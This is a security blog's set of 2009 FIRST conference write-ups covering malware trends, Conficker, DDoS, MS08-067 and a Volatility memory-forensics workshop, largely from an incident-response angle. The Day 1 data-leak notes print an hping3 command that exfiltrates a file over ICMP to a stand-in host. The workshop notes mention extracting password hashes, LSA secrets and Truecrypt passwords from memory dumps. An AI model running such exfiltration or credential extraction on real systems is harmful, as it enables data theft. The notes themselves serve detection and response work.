Cатсн²² (in)sесuяitу / ChrisJohnRiley

Because we're damned if we do, and we're damned if we don't!

Tag Archives: Japan

21st FIRST Conference – Day 5

Today is the last day of the conference. It’s been great so far, but it’s not over yet 😉

Security and the younger generation – Ray Stanton

This is the first time in history that many countries have 4 generations of people working alongside each other.

Who are the younger generation ?

  • Language
  • Culture
  • Demands
  • Speed of learning
  • Expectations
  • Pushing the boundaries

Generation Y (refers to a specific group of people born between 1982-2000). The majority of Gen Y spent a significant amount of time leading an online lifestyle.

Gen Y statistics (Junco and Mastrodicasa Study 2007)

  • 97% own a computer
  • 94% own a mobile
  • 76% use Instant Messenger (15% logged in 24/7)
  • 34% use websites as their primary source of news
  • 28% author a blog and 44% read blogs
  • 49% download music using peer-to.peer file sharing
  • 75% of college students have a Facebook account
  • 60% own some type of portable music and/or video device such as an iPod

Companies must make their security policies relevant to Gen Y. Language that is easily understood and interpreted by Gen X, is interpreted differently by the newer generation.

Gen X are fast at adopting the new technologies (they are also the largest group), however Gen Y are the ones the push the boundaries and innovate.

Find ways to make it work

  • Moodles – styles of eduction
  • Listen
  • Engage
  • Never, ever, say No! They will just go around you
  • Participate
  • Embrace

10:15 Conficker Research project – Aaron Kaplan (CERT.AT)

The guys from Cert.at gave a nice graphic geographical representation of infection rates of conficker using a google earth overlay.

By looking at the the scale of infections over time it was possible to create an animation showing the  clean-up process in various countries around the world. To of the list of infections were China, Brazil, and Russia

11.00 Show me the evil: A graphical look at online crime – Dave Deitrich (Team Cymru)

Bad neighborhoods (most infected systems) – China, US, German and Brazil are top. However these are the locations with the largest number of online users. When looking as a percentage of online users, these countries are way down on the list.

Charts of infections by IP-ranges and statistical information available on Team Cymru’s website.

Concentration of bot-net controllers in more developed regions – US, Germany, Korea

When tracking bot activity (conficker) the number of bots reporting in dips on a Sunday due to systems in companies being powered off. The time of systems reporting in also supported this assumption as most bots where reporting in within working hours (depending on the region of the bot)

DDoS tracking showed the targets in US and Europe were most popular. However everybody is effected as service providers spread the cost of DDoS protection between all of it’s customers.

Lack of data collection in areas such as Africa is a problem when forming statistics. If more data was available then a completer picture could be put together.

11:30 Internet Analysis System (IAS): Module of the German IT early Warning System – Martin Bierwirth/Andre Vorbach

Designed as part of a project to protect critical infrastructure. Passive sensors are located at partner sites and provide information (filtered and anonymous) on network traffic. These partners are most in government networks, but are also installed in other partner networks.

Every five minutes a sensor transmits about 560kb of data

IAS data privacy

  • Does not monitor data with personal reference
  • Does not reassemble TCP flows
  • Independent of IDS systems
  • Revoke context of a packet after building it’s counter

Manual research on the data is done through a program developed in co-ordination with German universities. Tracking of outbound HTTP traffic get-requests allowed BSI to check the agent strings and confirm that users are not using insecure versions of software like Firefox. Charting showed versions from 1.0 through to the latest (at the time of data) 3.0x version.

IAS gives data to be able to ask the right questions. By using profiling it is possible to automatically identify traffic patterns that are out of the norm for the network.

Example: DNS spike of traffic across 3 separate networks. By looking at the traffic it appeared to be a large number of spoofed DNS requests for the “.” record. Source IP-Addresses were spoofed. It was discovered that the 3 networks were being used as part of a reflective DDoS attack. By tracking across multiple partners it is easier to see when attacks are targeted. When monitoring government networks it is easy to think that all attacks are targeted ones.

Aggregated data extends the perspective of individual networks.

Prospects: Deploy more sensors, Automatic correlation of data

13:30 New Developments on Brazilian Phishing Malware – Jacomo Piccolini

Changes from 2008 to 2009

Malware levels have remained around the same. 30-40,000 unique per year. Although the amount has remained constant, the quality has increased. Less usage of Delphi, Visual Basic in programming. Move towards Java / C++.

Targeted attacks are rare. Most attacks spread through the use of spam email giving links to users (themed attacks).

Many malware samples are using simple attacks that alter the local hosts file to redirect victims to phishing sites (password stealing, etc…). This is not rocket science. Keep it simple. Most examples concentrate on adding hosts entries for Brazilian banks.


Attacks against government information systems using malware. Access to the Brazilian database gives you access to all information on a citizen (car registration, job information, income, Tax information, travel permits, Visas, family ties, personal information, arrest history, picture, gun permit information, signature, etc…). The malware uses a simple overlay to steal the logon for a user. These logons were on sale on the streets of Sao Paulo, Brazil for $1000.

This information was covered in the media in Brazil. I can’t find the footage in English, however the original is available on youtube.

Newer malware used to install a BHO (Browser Helper Object). This then routes all your traffic through a single proxy when the traffic meets specific criteria (in most cases access to bank websites). The proxy would then re-direct to another phishing server to steal the credentials. When this malware was run through virustotal, no AV vendor discovered it.

Stronger focus on malware. Blocking access to documents, pictures and a range of other files. The machine then warned the user to use a specific AV to clean the system. For $10 you can then buy the AV product (scam product) to regain access to your files. Low cost extortion. The malware locks the files through “GetActiveWindow” call to block the applications. All files are still present. If you copy the file off to another machine then they are all available again.

DNS cache poisoning is also still an issue. On 11th April 2009 one of the biggest banks in Brazil suffered a dns poisoning and redirected traffic to a phishing site. This issue was resolved in 7 hours (it was on a Sunday).

Brazilian Initiatives

Defensive Line website (www.linhadefensiva.org) –> community blog that deals with end-user infections. Acts as a CSIRT team (ARIS-LD) and also provides anti-malware tool (bankerfix). This team is looking for assistance in developing their new software solution. Please check the website if you can assist them.

Malware partol (www.malwarepatrol.net)–> Provides blocking lists to many applications (mta, proxy, dns…). These are updated on an hourly basis and made available for any purpose. Some files tracked by Andre are still online after 4 years of tracking them.

Federal Police: Operation Trilha –> 691 law enforcement agents, 139 arrest warrants, 136 search warrants, 12 Brazilian states (28 cities), in addition to arrests in Brazil, 1 arrest was made in the US.

Malware is an alternative source of income and for some “just a job” – social issue

My take from this presentation is that the Brazilian malware economy is very internally focused. Brazilians targeting specifically other Brazilians and Brazilian banks in particular. This is something to watch in the future however, as the malware authors become more proficient they are beginning to branch out into other markets.

Overall the FIRST conference was a great experience and gave me a different perspective than my normal conferences (mostly hacker style cons like CCC, Blackhet, etc…). The fact it was in Japan just adds to the overall effect of course. I wish I had more time to look around and really take in the culture. Hopefully I can arrange some time next year to make a long tour of Japan with my lovely girlfriend. I’m accepting donations 😉 Here’s to next years FIRST conference in Miami.

21st FIRST Conference – Day 3

Today’s big thing is the Volatility training from Andreas Schuster. I’ll be trying to attend some talks after the workshop is over were possible.

09:00 Attacks Against the Cloud: Combating Denial-of-Service – Jose Nazario

Cisco anticipates that 90% of bandwidth usage will eventually be used for video services. Historically the Internet has been a nice to have. As services such as communications move to the Internet it becomes a need to have. Availability and quality of service becomes more of a serious issue. Telephony services are a key point. People need to communicate, especially in the event of an emergency. 911 emergency services need to be available all the time.

The generic definition of the cloud – “If somebody elses stuff breaks, your business grinds to a halt”

Internet attack sizes have grown from 200Mbps in 1999 (based on code-red traffic levels) to 50 Gbps in 2009. The trend appears to be a doubling of attack bandwidth year on year.

Historical effects of Denial of Service attacks

  • 1999 –> Routers die under forwarding load
  • 2002 –> Servers die under load
  • 2005 –> Renewed targets in infrastructure (DNS, peering points)
  • 2008 –> Web services

Service providers are now able to cope with the attack traffic. In turn this has caused the problem to move on to the customer. With the event of caching servers and load balancers the attackers have moved to use methods designed overload backend servers with hard to resolve requests. This bypasses the protections put in place in most organisations.

The change of Denial of Service from fun to criminal

  • 1999 –> IRC wars to lead to widespread adoption of primative DoS/DDoS tools
  • 2001 –> Worms: Code Red, Nimda, SQL Slammer
  • 2004 –> Rise of the IRC botnets: Online attacks go criminal
  • 2007 –> Estonia attacks cause governments around the world to worry about cyberwar
  • 2009 –> Iran election results lead to DDoS, Twitter, etc…

Providers have responded by protecting their own infrastructure and using manual blackhole routing as a protection measure (2001). Providers then start to offer DoS protection as a service to customers using BGP injections (2003). Finally providers begin protecting key converged services such as VoIP and IPTV using multi-GBbps inline filtering (2007).

09:30 I am a Kanji: Understanding security one character at a time – Kurt Sauer

Teaching somebody about security is not unlike teaching somebody how to understand Japanese kanji. There are around 50,000 kanji, and they can have multiple definitions. Not an easy task.

Great presentation. I’d suggest looking at the slides/video to get the full effect. Nothing ground breaking, but definitely worth the time.

11:00 Windows Memory Forensics with Volatility – Andreas Schuster

Like yesterday, this is more of a workshop than a presentation. I’ll post up any links / information that might be useful however. You can find the slides and workshop information (along with other good information) on Andreas’ blog

Part 1: Refresher – Memory Fundamentals, acquisition, kernel objects, analysis techniques
Part 2
: Using Volatility – Volatility Overview, analysis w/ Volatility
Part 3: Programming – Developing plug-ins for volatility

PART 1: Refresher

Live Response

  • Focus on “time”
  • Acquisition and analysis in one step
    • Untrusted environment
    • Not repeatable
  • Tools tend to be obtrusive

Research from Aaron Walters and Patroni (2006) that details the percentage of RAM changed when a system is in idle state and during a memory dump –> Blackhat DC presentation from 2007 details this information. Research shows that 90% of freed process objects are still available after 24 hours of idle activity.

Focus of live response is on Main memory, Network status and Processes. When performing memory acquisition, Installing agents prior to the incident can help to minimize the impact.

Expert Witness Format – Used primarily by Encase. libewf project – Joachim Metz (http://sourceforge.net/projects/libewf/)

powercfg /hibernate on” –> Enables hibernate from the command-line on Windows systems. More information on the powercfg command can be found on Microsoft Technet.

Basic memory analysis: piping memory through strings and looking at interesting results. –> Remember to set ASCII/ANSI and UNICODE

  • Many false positives
  • Memory is fragmented
  • Conclusions hard to form (hard to prove connections between strings, discoveries might be mis-leading)
  • Obfuscation

List walking: Find initial pointer and traverse the doubly linked process list –> Applies to single lists and trees

  • Easy to subvert (anti-forensics)

Scanning: Define signature and scan the entire memory for a match

  • Slow
  • OS dependant (patches can break things)

There are also a number of hybrid methods used.

PART 2: Using Volatility

Originally developed in 2006 as a tool called FATkit. This was then used as the basis for VolaTools in 2007. The VolaTools project was transferred to Microsoft through a company buyout. The project was restarted and completely reprogrammed at  an open-source project – Volatility

SVN version is available from http.//code.google.com/p/volatility/

Standard options for Volatility are .:

-h, –help            show this help message and exit
-f FILENAME, –file=FILENAME (required) XP SP2 Image file
-b BASE, –base=BASE  (optional, otherwise best guess is made) Physical offset (in hex) of directory table base
-t TYPE, –type=TYPE  (optional, default=”auto”) Identify the image type (pae, nopae, auto)

For help on specific functions, volatility <function_name> -h

http://www.forensicswiki.org/wiki/List_of_Volatility_Plugins contains a list of published plug-ins for the framework

A number of functions within Volatility have been updated to improve speed and reliability. An example of this is the thrdscan/thrdscan2 function. The updated versions usually run faster than the original versions. It may be best to check the output between the older/newer versions to ensure that you are receiving consistent output and not any false positives/negatives.

volatility modules -f <memory_dump> –> outputs a list of loaded modules (driver files). The modscan2 function will give a more comprehensive list of loaded (and previously loaded) modules (if the metadata is still present in memory). The moddump function can be used to extract a module from the memory dump for further analysis.

Using scanning modules is very helpful as it will reveal information on not only what was loaded at the time of the memory dump, but also scan the entire memory for any matching signatures of what may have been loaded/unloaded prior to the dump. This is the case for not only modules, but also processes as well.

The pstree plug-in is useful to output a process tree (ASCII style).

However not all processes are listed. By using pcscan2 with the “-d > output.file” option you can create a file that can be opened in ZGRViewer. This shows a full graphical output of the process list including start and end-time of each process. ZGRViewer also offers very helpful search functionality to help find processes within the tree.

By finding the PID of a process you can then use the files, and dlllist to find the open files for the process in question. By running getsids you can examine what account started the process, as well as information on if it was interactive or not. You can also use the regobjkeys to examine what was in use within the registry by each PID. By running the procdump function (with the PID of the suspicious executable) you can extract the process into a file for further examination.

Examine open connections and sockets is also simple. Volatility has the connections function (along with connscan/connscan2) and the sockets function (along with sockscan/sockscan2). These functions will output the PID of the creating process so it can be mapped back to processes discovered in the process listing performed earlier. As with a majority of the scanning functions, they may find information on sockets/connections that existed, but were no longer open when the memory dump was performed.

As part of the VolReg plug-in you can also output things like the LSA secrets, as well as password hashes. These rely on information form the hivescan/hivelist functions. Performing the hashdump is something that’s been covered before on various blogs. If you want a rundown of how to perform a complete dump of password hashes, I’d suggest checking out Chris Gates’ post on the carnal0wnage blog, or the forensiczone walkthrough.

Some interesting plug-ins to explore –> cryptscan (to search memory for Truecrypt passwords), malfind (to search for possible injected code), dmp2raw/raw2dmp (for converting formats — Crash Dump format).

This was a great workshop. I’d love to have spent longer going through things. However the point was to demonstrate how to use the Volatility tool and not to teach n00bs like me how to do proper analysis. I’ll have to take the time to run through the examples and slides again to really get to know the process fully.

16:00 Incident Response and Voice for Voice services Lee Sutterfield

Protection of dedicated VoIP services by using a specifically designed Voice Firewall alongside existing firewall technologies. Unlike a normal IP-based firewall, a Voice Firewall is designed to restrict the actions of a user within the policy of the organisation. This includes restrictions such as limiting the destination of dialling from specific extensions (block long distance, international), limit on the time and duration of calls. It also offers the ability to restrict incoming calls to prevent access to dial-up services from unwanted numbers. This can be implemented to prevent war-dialling attacks by restricting based on the source of the call and pattern of inbound calls.

A Voice Firewall is primarily designed to prevent things like toll fraud instead of defending the system from attack. It also offers better visibility into the usage of your voice network and provides alerts when certain trigger levels are exceeded.

Another usage of Voice Firewalls is blocking calls to prevent crank calls, or active war-dialling attempts. Any calls from this number are then blocked and the attempt is logged. Using this technology it is possible to protect against / log attempts of vishing attacks.

Voice Firewalls can be used to assist with the following security points .:

  • Unauthorised modems
  • Remote access (modem) attacks
  • Phone service misuse
  • Toll fraud
  • Harassing/Threatening calls
  • Malicious software (triggering calls to pay numbers)
  • Vishing attacks
  • Denial of Service (against VoIP services)
  • Bomb threats (call  recording)
  • Improve voice uptime
  • Stop data leakage
  • Reduce telecom total cost
  • Baseline/plan/optimize (new VoIP deployments)
  • Policy driven call recording

Voice Firewall technology address age old vulnerabilities and lock-down mechanisms. This increases your ability to provide improved incident response and preventative services to the enterprise as well as via Managed Security Services for Voice (MSSVs).

Well we”ve hit the mid-point of the conference. It’s been great so far. Tonight we have the FIRST conference banquet. Hope they have sushi else there might be a riot 😉

21st FIRST Conference – Day 2

I’m still not over the jet-lag, but still, day 2 of FIRST rages on. The pre-conference talk started with the announcement that Interpol have been accepted as an official FIRST member. The winners of the best practices contest (this years focus was on detection of attacks) were announced, with CISCO CSIRT taking the award with a paper on Netflow (the papers should be available on the FIRST website later today). Second place was awarded to CERT-FI.


09:00 Reconceptualizing Security – Bruce Schneier

Thinking about what security and risk means and how we deal with it. Security by definition involves human beings. We need to define how people think about security. You can have security without actually feeling secure. You can feel secure when you’re not. These are 2 different things. A separation should be made between the feeling of security and the reality of security.

Security is a trade-off. Giving up something in order to gain a degree of security. However what is given up needs to worth the trade-off. Whether or not something is worth it comes down to a personal choice. People have a natural intuition when it comes to security. Although humans are on one hand good at evaluating their security, they can also sometimes be very bad. This is what drove Bruce to research the “The Psychology of Security“.

Humans are built to make quick decisions. Getting the good answer fast is better than getting the best answer slow.

Humans rationalise the familiar as more secure than unfamiliar. People are afraid to fly, yet are happy to drive, although the risk is higher. 42,000 people die every year in the US from car accidents. This figure is much higher than plane accidents. Humans overreact to rare risks more than risks we accept everyday. We
will be more likely to stop doing something if a close friend is
effected than if many many people who we don’t know are effected.

The economic incentive is to make people feel secure. However the feeling and reality don’t always match.

Discussion of the various mental models based on experience, press, government, industry and human feelings. Humans are better at focusing on risks that are in the short-term, and are very bad at realising risk that is far off.

Security decisions are often made for reasons with nothing to do with security. The person making the decision will manipulate the model based on their view of reality and their requirements. Stakeholders will try to convince others that their views are correct.

If you believe something, then evidence against that belief will often be ignored, were positive evidence will reinforce that belief.

Flashbulb moments that change peoples mental models – 9/11 Terrorist attacks and the JFK assassination are examples of US flashbulb moments. Each culture has their own.

Change happens slows. Even easy changes such as changing peoples smoking habits have taken decades. People are quick to reject new models if they don’t agree with our feelings. Our feeling on global warming (what we see in-front of us) doesn’t always agree with the new scientific model of what will happen.

Security reality and security feeling should be balanced. If people feel insecure they will not trust the technology, if they feel too secure they will be at risk.

All effort is put into feeling secure. Some part of that however spills over into the reality of being secure. Some things that are implemented to increase the feeling of security in-fact lower the reality of security.

Building a surveillence infrastructure makes us less secure.

Economics doesn’t support security and reliability. Features are the main driving force in technology.

11.00 Network Monitoring Special interest group: Monitoring & Analyzing Client-side Attacks

This special interest group was in the form of a workshop.

You can download the vmware image (Debian), PDFs and PCAP files used in the workshop – HERE.

The demos focus on client-side / drive-by downloads using examples for fast-flux and non-fast-flux style attacks. The workshop uses a downloadable Debian VM with some self developed tools (based on Rhino).

I opted to skip the afternoon section of the workshop. I’ll work on the exercises on the plane home 😉

13:30 Comprehensive Response: A Bird’s eye view of Microsoft Critical Security Update MS08-067 – Microsoft

Microsoft Security Response Center / Microsoft Malware Protection Center give an overview of Microsoft’s response to the MS08-067 vulnerability and the rise of conficker.

The MSRC has 3 main areas of responsibility .:

  • Investigate and Resolve Vulnerability Reports
  • Microsoft Security Response Process
  • Building Relationships and Communications

When releasing a security update Microsoft follow a dual track to manage and deal with the patching process

  1. Vulnerability Reporting
  2. Triaging
  3. Managing Finder Relationship
  4. Content Creation
  5. Release

In tandem with the above process (at steps 2-4), a technical fix is developed and tested.

  1. Creating the Fix
  2. Testing
  3. Update Dev Tools and Practices

A lot of effort is put into the testing phase to ensure that the patch deals with the issue, doesn’t create other issues (security or non-security related), and is compatible with other products.

Microsoft release day means staff getting in at 6am to monitor the process and make sure everything runs smoothly.

MS08-067 (October 2008)

  • Vulnerability found in Windows Server Service (netapi32.dll)
  • Wormable
  • Large install base
  • Exploit and limited attacks known; widespread malware probable

This vulnerability was discovered through the customer support services department. A specific crash was reported by a customer who was experiencing issues. Originally though to be another attack attempt against the flaw originally patched in MS08-040. During further research it was found to be a seperate vulnerability.

The vulnerable function is the ConvertPathMacros function

  • Exposed via anonymous RPC endpoint
  • Replaces path macros (\– and \)
    • Normal usage \foo\bar\..\bas -> \foo\bas
    • Normal usage \foo\bar\.\bas -> \foo\bas

This attack string forces the ConvertPathMacros to look back into the stack for the previous slash. Some pre-staging of the atack must be made to trigger the exploit.

By using fuzzing it was possible to trigger the vulnerability and search for possible varriations of the attack. Microsoft didn’t want to fix netapi32.dll again (after already fixing it in MS06-040 and MS06-070). So all cases were tested to make sure it was done right.

MAPP partners were provided with packet captures, safe PoC, technical description, information about the malware currently exploiting the vulnerability, stack traces.

Through the security bulletin customers were given workarounds – Block SMB, Stop services, Vista\WS08 RPC firewall rule to block UUID, Chacl tool to change named pipe ACL

Response Timeline .:

Oct 6th – Received notification of vulnerability
Oct 6th – Reproduced vulnerability on reported platform (XP SP2)
Oct 6th-10th – Begin testing other effected platforms
Oct 10th-22nd – Fix developed and core baseline of testing completed (due to out-of-band release)
Oct 23rd – Patch pushed out through all update platforms (WSUS, Windows Updates, etc…)

The process of releasing this patch was compressed from a 2 month process into a 17 day process due to the severity. Despite this work, customers complained about the patch coming out-of-band. Microsoft rarely release out-of-band patches (In 2008 Microsoft only released 2 out-of-band patches).

Analysis showed that malware was exploiting this flaw beginning on 13/08/2008 – These were targeted attacks designed to drop TrojanSpy:Win32/Gimmiv onto the system. Data was then collected and sent to a server in Japan. Detection for Gimmiv was added into the MSRT tool in November.

After the patch was released more trojans began to use the exploit (Trojan:Win32/Wecorl, Trojan:Win32/Clort). The first worm using this exploit (Conficker) was seen on 21st November. The code used in Conficker didn’t appear to be linked to the earlier team who developed Wecorl/Clort.

The name Conficker was from a string found while Microsoft analyzed the original variant (Traffic-converter.biz).

Conficker B was less about exploiting vulnerabilities and more about testing company best practices (weak passwords, autorun, local administrative permissions, etc…)

Comparison between the various versions of Conficker.

  • Variant A – Spread only through the MS08-067 exploit
  • Variant B – Began to brute-force network shares, infecting network/removable drives, and using scheduled tasks to run the worm on remote machines.
  • Variant C – No new infection methods – Added P²P communications
  • Variant D – No infection required – distributed as an update to previously infected systems (B and C variants)
  • Variant E – No infection required – distributed as an update to previously infected systems (B, C and D variants)

It’s impossible for one vendor to do everything alone. Collaboration across the industry is vital in fighting people who distribute malware.

Around 100 people at Microsoft worked on the MS08-067 / Conficker problem between all phases of the incident. This raises an issue of scalability. If multiple issues like Conficker hit at the same time, then there may be problems handling the load (as yet untested).

16:00 INTERPOL Initiatives to Enhance Cyber Security – Vincent Danjean

Interpol was created in 1923 and is the worlds largest international police organisation with 187 member countries.

There were a lot of statics and information presented on success stories. I’d suggest taking a look at the slides as there is very little point in me reprinting the statistics and facts. The information is a little dry however. So you have been warned 😉

Well that the end of day 2. It’s been another long day. time for that beer…

I managed to have a long chat with Sherri Davidoff and Johnathon Ham today after the client-side attack workshop. Johnathon managed to finish the first exercise within a few minutes while most of us were still looking for the right PCAP file. His strategy for the analysis was so straight forward, but very effective for quick analysis of captures. I always enjoy talking to people smarter than me (it happens a lot) as I get learn something new. I’m looking forward to Sherri’s talk at Defcon as well. It sounds like it’ll be really interesting.

Tonight is the vendor showcase. Normally I shy away from that kind of marketing event, but they have beer 😉 Tomorrow I’ll be attending the volatility workshop held by Andreas Schuster (it’s going to be a day of fun playing in memory). So the blog might be a littler short tomorrow. Maybe that’s a good thing though. I talk too much…

21st FIRST Conference – Day 1

Well I’m finally over my jet-lag, ok, almost over my jet-lag, and day 1 of the 21st FIRST conference is just about complete. I managed to hit a few interesting talks today. Not all of them were public information, but I’ve written up some notes from the ones that were for your enjoyment. Short note, this isn’t a high-tech conference like Blackhat, so if you think the information is a little high-level, then you’ll understand why. The focus of the conference is more in Incident Response and Handling, than my usual attack vectors stuff, but so far it’s been  a great experience. Hope you enjoy the write-up.


09:00 Information Security Management and Economic Crisis – Suguru Yamaguchi

I know that keynotes are usually meant to be dry and a little bit boring (sorry, but you can’t sugar coat the truth), however I decided to risk it and pop in to see what was on offer. It seems that nobody told Mr Yamaguchi that he was meant to be boring, which made for a bit of a surprise. After a quick guide to what to see in Kyoto (along with shopping tips) and some historical information about Japan (any why the food was much better here in Kyoto than in Tokyo) the talk moved into the more serious side of risk management in the current economic climate. The topics covered were varied, so stay with me if it seems a little chaotic.

Economic Crisis / time of “less”

The initial focus was on the use of technology in Japan to automate and streamline services such as speed/control systems used in the Japanese bullet trains, management of the Tokyo underground network, RFID for stock tracking/distribution management (to automate shipping of stock to locations depending on demand) and water control/flow management. The use of technology is also now working it’s way into smaller businesses such as taxi services (using TCP/IP connected terminals in the cabs to transmit requests and improve management of services). IT is now a vital component of all businesses, not just large multi-nationals, but also the smaller businesses are becoming more reliant on these systems for everyday business purposes.

“perimeter protection model” doesn’t work anymore

With the increase in outsourcing, ASP, SaaS and cloud computing the perimeter is much more fluid and undefined. Services are now from entities in other countries. Different rules, laws and standards.

Risks have changed dramatically

  • Quality and Quantity of “attacks”
  • Economic damages
  • Who is attacking / being attacked

“Public Private Partnership” –> Government policy to encourage knowledge sharing across business domains (especially critical infrastructure)

Main goals set in 2006 (in Japan), new goals to be reviewed in 2009 .:

  • More preparedness
  • More scientific approach
  • Share risk between business and government

The economic crisis have caused costs to be cut in various ways. Less investment in information systems (including information security management). Slow down of innovations, upgrades and improvements. As the headcount lowers, companies are unable to innovate and adapt as easily as before.

Mission impossible for system operators. Lower budgets, less staff and increase in security incidents (rise in data loss/theft issues). Cost savings and security assistance can be achieved through the use of virtualization and BYO (Bring Your Own) laptop schemes. BYO – Using personal laptops for business uses. Based on virtualization or thin-client solutions. Reduces costs and can help improve security.

Real-time 3D visualization by Nicter (Network Incident analysis Center for Tactical Emergency Response)

Use of visualization in comparing attack traffic to normal traffic. By using this technique it is easy to see portscans, DoS attempts and a variety of other attack types visually and in real-time. Helps to streamline information management in a time when less needs to do more.

Invisible computers a growing risk. Electronics that are not traditional computers, but operate on the TCP/IP networks (HD-Recorders, Set-Top boxes, etc….) These systems are more vulnerable and open to abuse. Attacks routed through these devices have started to be seen in the wild in Japan.

13:30 Proprietary data leaks: Response and Recovery – Sherri Davidoff / Johnathon Ham

Scenario: Attacker has physical access

Attacker Profile: Staff member, cleaning staff, security guards, etc…

Spybase Wireless Keylogger ($285 Amazon)

  • Install once and access through wireless to download the data
  • Staff are unaware/untrained on what to check for on a system to check for a keylogger

Questions to ask in a response scenario

  • How long has the keylogger been installed ?
  • Who planted it ?
  • What information has been exposed ?
  • What other systems could be exposed ?

Keyloggers have serial numbers, many manufacturers will provide information on sales to law enforcement in the event of an incident. Track other systems that have had the same device installed. Often the attacker has tested it on his/her own machine first. If this is an internal staff member, then this may be a source of information.

USB devices come in many different formats. Pens, wristbands, iPods, Sushi (yes as seen in Johnny Long’s presentation), and many different places to hide things like micro-SD. Ironkey have a professional USB that supports remote wipe. If you recover this kind of USB in an incident response, store in a suitable bag to block incoming wipe commands.

Sherri performed a live demo that demonstrated how easy it is to download data from a system to a phone connected through USB. By using encryption and deleting the key after encryption it is possible to prevent a responder identifying what data was copied.

In physical access cases .:

  • Monitor account/system usage
  • Preserve evidence / chain of custody
  • Determine type of affected data
  • Contact legal advisers
  • Lockout / monitor (depending on situation)
  • Identify systems that could also be exposed

Scenario: Attacker Logical Access

Use of convert channels to ex-filtrate the data without triggering defenses

Examples of covert channels :

  • ICMP Echo Request Tunneling (Loki)
    • Implemented using HPING3 -E secret.xls -1 -u -d 1024 nonexistent.domain.com
    • Capture using TCPDUMP

Hard to track where the data is going (ICMP to a nonexistent domain). Attacker must be somewhere in the line to capture the data using TCPDUMP. Open in Wireshark and then carve out the file.

How to protect against this ?

  • Track the data export at the database
  • Log commands run on servers / applications installed on servers
  • Should this server be sending Echo Requests ? Block and Log
  • Watch for proprietary data on the wire (in cleartext)
    • Using RegEx to detect set data
    • Implement using something like SNORT

Use Honeytokens to trigger alerts. Insert dummy records into the database (that should never be returned unless the whole table is dumped), files with seemingly interesting data (passwords.xls) which are present in a non-browsable area of your website. Insert code-comments into the source-code of your internally developed applications and create rules to alert/block traffic leaving your network with these comments.

Doesn’t prevent exposure, doesn’t provide the depth of the issue, however the first piece of the puzzle is being aware that something bad is happening.

Issues: Encryption of the data will prevent this honeytoken being tracked.

Solution: Frequency analysis – Detect the frequency of hex values to discover if the data is encrypted. Search and alert on encrypted data where it is not part of the normal traffic pattern. Entropy-based anomaly detection detection through the SNORT platform. No plugin yet for this purpose. Stay tuned…

Last point of recovery process needs to be an improved preventative posture. Lessons learned.

What we’ve learned :

  • Think like an evil insider
  • Log everything possible to improve the scoping of the breach

14:30 Using Social Media in Incident Response – Martin McKeay

Staff / Responders that use social media are releasing information live as it comes in. Due to the fact this is a live response, it can often be more about emotion than about fact. Company policy for electronic media (including social media) isn’t set in a majority of companies. Those that do have a policy do not always enforce the policy, or make staff aware of their responsibilities.

Companies are slow to come to social networking and are seeing issue when they look to claim their company name or trademark. Who is currently using your company name on Twitter, Facebook, MySpace, etc… ? Incidents of non-staff taking the name of companies and using it to communicate as if they are the company. There are also cases of unauthorized staff using the company name within social networking sites or blogs. Readers of official company blogs and social media services are unforgiving when it comes to pure marketing and sales messages. In order to be a useful communication tool for handling and communicating incidents, you have to build followers and readers prior to having an incident. This takes more than just posting up marketing information and expecting people to listen.

Company policy should dictate what happens when an incident occurs. If you suddenly stop twittering/blogging then people will notice and think the worst. News travels fast on social networks, and unless you supply the news, this information can come from any source and be based on pure speculation. AT&T outage can be used as a good example. In the case of AT&T, many users one Twitter where mapping out the areas suffering a connection outage although AT&T didn’t talk about the issue openly. This has caused damaged to AT&T’s reputation.

Key points .:

  • Assign person who will communicate
  • Policy on what to communicate
  • Who is dealing with Blogesphere / Social Media

16:30 Emerging Threats and Attack Trends – Paul Oxman

Threats are moving up the stack towards targeting individuals.

Designer malcode is now being developed using bleeding edge software development techniques and protections. As with other software maturity models, malware has also begun to adopt the same processes. Backup Malcode is being made available to customers in order to replace the original once AV vendors catchup and start detecting the attack code.

Large-scale worms are getting rarer as attacks become more targeted and selective. As the large-scale attacks drop, the cybercrime profits have increased. Email as an attack vector is also slowing as web based vectors increase in popularity. Blended attacks are becoming more prevalent.

Cyber-terrorism – Future conflicts are much more likely to have a cyber element to them.

2008 Security

  • 70% of the top 100 websites pointed to (or contained) malware
  • Number of vulnerabilities up 11% from 2007
  • Reputation HiJacking on the increase
  • Attacks are more targeted to help maximize effectiveness
  • More reliance on blended threats

Issues of hardware being infected at “source” to catch consumers off guard. A user is more likely to accept an install request when you plugin a new device (i.e. digital photo-frame).

Attackers are taking information gathered from phishing attacks and using it on various popular services to catch users who are relying on a limited set (or even just one) password for multiple services/sites.

July 2008 – 45% of browsers still vulnerable despite auto-update features.

Malware targeting current events (Olympics was a prime target for attack). The fake Olympics website netted 40-50 Million USD, and gathered username/passwords for further attacks on websites.

Known vulnerabilities are left unpatched. Attackers don’t have to come up with 0-day attacks if they can exploit know issues.

Case study of how the creators of conficker evolved their attack by updating from MD5 to MD6 and then patching a flaw in MD6 when it was found to be vulnerable. 85% of code was replaced from 1 version to another. Not your average malware.

Threats on the horizon:

  • SMS vishing
  • Extensive social engineering
  • More highly targeted attacks
  • Attacks on mobile devices (different OS an issue for attackers)
  • Using video sharing sites as a method for distribution of malware

Incident response. The most important factors are preparation for the (inevitable) attack/incident, and the post-mortem to learn from your response (often forgotten or skipped).

Well that’s all from day 1. No sushi yet, but the night is young. More to follow after day 2 😉